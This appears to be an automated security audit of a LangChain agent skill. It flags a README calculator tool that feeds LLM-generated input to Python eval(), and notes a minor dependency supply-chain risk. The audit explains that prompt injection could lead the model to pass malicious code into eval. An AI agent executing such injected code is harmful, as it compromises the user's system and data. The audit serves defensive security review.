langchain
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- REMOTE_CODE_EXECUTION (HIGH): The 'calculate' tool example in the README uses the 'eval()' function to process the 'expression' string argument. In an agentic context, this input is typically generated by the LLM. An attacker could use prompt injection to trick the LLM into passing malicious Python code (e.g., system commands or file exfiltration) into the eval function, leading to a full system compromise.
- EXTERNAL_DOWNLOADS (LOW): The skill instructs users to install several third-party Python packages (langchain, langchain-openai, langchain-community, chromadb) via pip. While the LangChain organization is recognized, installing external dependencies from public registries always carries a baseline supply chain risk.
Recommendations
- AI detected serious security threats
Audit Metadata